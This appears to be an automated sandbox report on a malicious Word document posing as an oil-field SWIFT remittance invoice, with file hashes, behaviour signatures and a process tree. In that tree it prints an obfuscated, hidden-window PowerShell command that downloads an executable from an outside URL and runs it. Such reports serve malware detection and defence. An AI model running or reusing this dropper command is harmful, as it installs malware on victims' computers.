Analysis

  • max time kernel
    121s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    21-10-2021 18:34

General

  • Target

    Invoice- 8765432345678 Oil_Field_Swift_remmitance.doc

  • Size

    56KB

  • MD5

    14124094350a4280daa20a5328ec2954

  • SHA1

    323f142b39d5a541d9ef68f98df26a28032ca12a

  • SHA256

    f4965c1fcd7e5104b08e9aca3cc989f1a487f64ee791f013ef105f981d67e90d

  • SHA512

    4cc0e648fbc349ea80fec1b55e047b388bd37e28c9a291f3b5a5f7b472be99c5c09afe12afaef9dc8776a802f42695998bc461523f77be922514972f421985ee

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://sec6ur1.x24hr.com/g/soleApp1.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 8765432345678 Oil_Field_Swift_remmitance.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Public\Documents\reallyAmerican.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://sec6ur1.x24hr.com/g/soleApp1.e`xe -Destination C:\Users\Public\Documents\assumeassume.e`xe;C:\Users\Public\Documents\assumeassume.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1028

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\reallyAmerican.cmd
      MD5

      fc82860b6a3c9fae492e2b7cf9e33764

      SHA1

      2e938f108588054a6f883a88e46e23f09e547e0d

      SHA256

      a42b0be57a07e979e30281c26bfad18f672591d8174e112316a0a1de1e6ee2b6

      SHA512

      e1765f3d4b95c3c11ec47ffe0e3c89fd91abbab839a0f3a7e0400fe969237bdf74741a64614c08ba8e7d4871bc5b806af92291c8bd92e9a6fc8b5f34e1ef3207

    • memory/840-58-0x0000000000000000-mapping.dmp
    • memory/1028-67-0x000007FEFB541000-0x000007FEFB543000-memory.dmp
      Filesize

      8KB

    • memory/1028-66-0x0000000000000000-mapping.dmp
    • memory/1128-64-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/1128-60-0x0000000000000000-mapping.dmp
    • memory/1128-63-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/1128-62-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/1128-65-0x0000000004B70000-0x00000000050A6000-memory.dmp
      Filesize

      5.2MB

    • memory/1224-57-0x0000000075871000-0x0000000075873000-memory.dmp
      Filesize

      8KB

    • memory/1224-54-0x0000000072031000-0x0000000072034000-memory.dmp
      Filesize

      12KB

    • memory/1224-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1224-55-0x000000006FAB1000-0x000000006FAB3000-memory.dmp
      Filesize

      8KB

    • memory/1224-68-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB